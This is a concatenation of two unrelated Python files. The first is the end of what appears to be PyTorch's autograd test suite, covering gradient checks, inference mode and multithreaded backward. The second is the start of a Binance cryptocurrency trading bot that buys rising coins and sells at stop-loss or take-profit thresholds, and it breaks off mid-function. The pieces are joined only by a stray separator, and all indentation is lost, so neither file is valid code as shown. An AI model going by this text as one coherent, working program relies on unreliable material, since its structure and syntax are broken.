d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
self._test_atleast(device, torch.atleast_1d)
self._test_atleast(device, torch.atleast_2d)
self._test_atleast(device, torch.atleast_3d)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
def _tensor_tensor_helper(x, y):
gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
with torch.no_grad():
x = x.clone()
x[torch.rand_like(x) > 0.5] = 0
gradcheck(lambda y: torch.xlogy(x, y), (y))
gradgradcheck(lambda y: torch.xlogy(x, y), (y))
shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
# For broadcastible shapes and scalar.
for x_shape, y_shape in permutations(shapes, 2):
x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
gradcheck(lambda y: torch.xlogy(0, y), (y))
gradgradcheck(lambda y: torch.xlogy(0, y), (y))
gradcheck(lambda y: torch.xlogy(2, y), (y))
gradgradcheck(lambda y: torch.xlogy(2, y), (y))
gradcheck(lambda y: torch.xlogy(y, 2), (y))
gradgradcheck(lambda y: torch.xlogy(y, 2), (y))
# Different shape
x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
# Same shape
x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
def test_copy_r_to_c(self, device):
out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
requires_grad=True)
def do_test():
out_c.copy_(inp_r)
out_c.sum().backward()
self.assertEqual(inp_r.grad, torch.ones_like(inp_r))
self.assertNotWarn(do_test)
def test_non_differentiable_ops(self, device):
# Just make sure the op doesn't raise an error
# and resulting tensor has requires_grad=False.
x = torch.tensor([[1, 2], [3, 4.]], requires_grad=True, device=device)
out = torch.isin(x, torch.tensor([2, 3], device=device))
self.assertFalse(out.requires_grad)
x = torch.randn(3, 3, requires_grad=True)
out = torch.signbit(x)
self.assertFalse(out.requires_grad)
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
@torch.inference_mode()
def func(x):
self.assertTrue(torch.is_inference_mode_enabled())
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(torch.is_inference(d))
self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces a inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# perform view operation produces inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument. So there isn't a mixed inference and normal
# tensor inputs for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since its equivalent as s.view(c.sizes()) which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
class PropagatingThread(threading.Thread):
'''Helper class to propagate exception from child
thread to main thread on join.
Reference: https://stackoverflow.com/a/31614591/5602957
'''
def run(self):
self.exception = None
try:
self.ret = super(PropagatingThread, self).run()
except Exception as e:
self.exception = e
def join(self, timeout=None):
super(PropagatingThread, self).join(timeout)
if self.exception:
raise self.exception from self.exception
return self.ret
threads = []
for _ in range(num_threads):
p = PropagatingThread(target=fn, args=args)
p.start()
threads.append(p)
for p in threads:
p.join()
def test_multithreaded_exception_propagation(self):
# Test whether exception in child thread
# are propagated to main thread.
def fn():
self.assertTrue(False)
with self.assertRaises(AssertionError):
self._run_py_multithread_fn(fn)
def test_simple_backward(self):
# simple multithreaded backward that create threads in the beginning of training
# and everything else is training separately, i.e. inputs, operations, etc.
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (i.e. This is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use functional grad() api, gradients will not
# be accumulate to the same place and should be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_multithread_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
def registers_hooks_for_each_thread():
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
x = torch.ones(5, 5, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
y = x * x
# should raise two warnings from x being saved twice
self.assertEqual(len(w), 2)
y.sum().backward()
def test_dataparallel_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
_self = self
class Model(torch.nn.Module):
def forward(self, x):
with warnings.catch_warnings(record=True) as w:
y = x * x
if torch.cuda.device_count() >= 2:
# DataParallel is calling the forward in different threads
# without progating TLS, so hooks should not be called here
_self.assertEqual(len(w), 0)
else:
# DataParallel only uses one thread
# so hooks should be called here
_self.assertGreater(len(w), 0)
x = torch.ones(5, 5, requires_grad=True)
model = torch.nn.DataParallel(Model())
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
model(x)
with warnings.catch_warnings(record=True) as w:
y = x * x
# hooks should be called here
_self.assertGreater(len(w), 0)
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
# different threads and we need to ensure user specify retain_graph=True, otherwise
# error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will be success in this case, all other threads should raise
# with the error that throw to user to recommend them specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# result should equal to num_thread * gradients
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
if __name__ == '__main__':
run_tests()
|
Binance Detect Moonings.py | """
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repositoy should be
construed as investment advice.Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
"""
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
# used to create threads & dynamic loading of modules
import threading
import importlib
# used for directory handling
import glob
# Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key
)
# for colourful logging to the console
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[91m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
DEFAULT = '\033[39m'
# tracks profit/loss each session
global session_profit, trades_won, trades_lost, is_bot_running
trades_won = 0
trades_lost = 0
session_profit = 0
is_bot_running = True
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head
initial_price = {}
prices = client.get_all_tickers()
for coin in prices:
if CUSTOM_LIST:
if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head += 1
if hsp_head == RECHECK_INTERVAL:
hsp_head = 0
historical_prices[hsp_head] = initial_price
return initial_price
def wait_for_price():
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
pause_bot()
if historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())
print(f'Working...Session profit:{session_profit:.2f}% Est:${(QUANTITY * MAX_COINS * session_profit)/100:.2f}')
# retreive latest prices
get_price()
externals = external_signals()
exnumber = 0
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
# each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than MAX_COINS is not reached.
if coin in externals and threshold_check > CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}')
else:
print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}')
elif threshold_check < CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Disabled until fix
#print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')
# Here goes new code for external signalling
'''for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and (len(coins_bought) + exnumber) < MAX_COINS:
volatile_coins[excoin] = 1
exnumber +=1
print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}')'''
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
return external_list
def sell_external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.sell")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
return external_list
def pause_bot():
'''Pause the script when exeternal indicators detect a bearish trend in the market'''
global bot_paused, session_profit, hsp_head
# start counting for how long the bot's been paused
start_time = time.perf_counter()
while os.path.isfile("signals/paused.exc"):
if bot_paused == False:
print(f'{txcolors.WARNING}Pausing buying due to change in market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
bot_paused = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
get_price(True)
# pausing here
if hsp_head == 1: print(f'Paused...Session profit:{session_profit:.2f}% Est:${(QUANTITY * MAX_COINS * session_profit)/100:.2f}')
time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
# resume the bot and ser pause_bot to False
if bot_paused == True:
print(f'{txcolors.WARNING}Resuming buying due to change in market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
bot_paused = False
return
def convert_volume():
'''Converts the volume given in QUANTITY from USDT to the each coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
lot_size = {}
volume = {}
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0:
lot_size[coin] = 0
except:
pass
# calculate the volume in coin from QUANTITY in USDT (default)
volume[coin] = float(QUANTITY / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
volume[coin] = float('{:.1f}'.format(volume[coin]))
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
return volume, last_price
def buy():
'''Place Buy market orders for each volatile coin found'''
volume, last_price = convert_volume()
orders = {}
for coin in volume:
# only buy if the there are no active trades on the coin
if coin not in coins_bought:
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
continue
# try to create a real order if the test orders did not raise an exception
try:
buy_limit = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
else:
print(f'Signal detected, but there is already an active trade on {coin}')
return orders, last_price, volume
def sell_coins():
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit, trades_won, trades_lost
externals = sell_external_signals()
last_price = get_price(False) # don't populate rolling window
#last_price = get_price(add_to_historical=True) # don't populate rolling window
coins_sold = {}
if USE_SESSION_THRESHOLD:
check_total_session_profit(coins_bought, last_price)
#TODO: call sell_external_signals() here
for coin in list(coins_bought):
# define stop loss and take profit
TP = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['take_profit']) / 100
